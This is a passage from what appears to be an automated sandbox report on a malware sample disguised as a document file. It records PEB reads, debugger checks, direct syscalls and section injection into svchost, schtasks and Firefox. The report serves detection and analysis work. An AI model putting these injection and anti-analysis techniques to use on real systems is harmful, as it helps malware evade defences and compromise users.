            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h] 2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h] 2_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h] 2_2_03BBE75D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h] 2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h] 2_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h] 2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h] 2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h] 2_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h] 2_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h] 2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h] 2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h] 2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h] 2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h] 2_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h] 2_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h] 2_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h] 2_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h] 2_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h] 2_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h] 2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h] 2_2_03B62674
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h] 2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h] 2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h] 2_2_03B4C640
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h] 2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h] 2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h] 2_2_03B6E59C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h] 2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h] 2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h] 2_2_03B64588
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h] 2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h] 2_2_03B325E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h] 2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h] 2_2_03B365D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h] 2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h] 2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h] 2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h] 2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h] 2_2_03BC6500
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h] 2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h] 2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h] 2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h] 2_2_03B644B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h] 2_2_03BBA4B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h] 2_2_03B364AB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h] 2_2_03BEA49A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h] 2_2_03B304E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h] 2_2_03B6A430
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h] 2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h] 2_2_03B2C427
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h] 2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h] 2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h] 2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h] 2_2_03BBC460
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h] 2_2_03BEA456
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h] 2_2_03B2645D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h] 2_2_03B5245A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h] 2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h] 2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h] 2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h] 2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h] 2_2_03B5EBFC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h] 2_2_03BBCBF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h] 2_2_03BDEBD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h] 2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h] 2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h] 2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h] 2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h] 2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h] 2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C04B00 mov eax, dword ptr fs:[00000030h] 2_2_03C04B00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h] 2_2_03B2CB7E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B28B50 mov eax, dword ptr fs:[00000030h] 2_2_03B28B50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h] 2_2_03BDEB50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h] 2_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h] 2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h] 2_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h] 2_2_03BD8B42
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h] 2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h] 2_2_03B86AA4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h] 2_2_03B68A90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h] 2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h] 2_2_03C04A80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h] 2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h] 2_2_03B30AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h] 2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h] 2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h] 2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h] 2_2_03B6CA38
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h] 2_2_03B6CA24
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h] 2_2_03B5EA2E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h] 2_2_03BBCA11
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h] 2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h] 2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h] 2_2_03BDEA60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h] 2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h] 2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h] 2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h] 2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h] 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h] 2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h] 2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h] 2_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h] 2_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h] 2_2_03BFA9D3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h] 2_2_03BC69C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h] 2_2_03C04940
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h] 2_2_03BB892A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h] 2_2_03BC892B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h] 2_2_03BBC912
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h] 2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h] 2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h] 2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h] 2_2_03BBC97C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h] 2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h] 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h] 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h] 2_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h] 2_2_03C008C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h] 2_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h] 2_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h] 2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h] 2_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h] 2_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h] 2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h] 2_2_03B52835
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_00426DA1
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_0042202E SetUnhandledExceptionFilter, 0_2_0042202E
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004230F5
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417D93
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00421FA7

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe protection: read write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe | Thread register set: target process: 6468
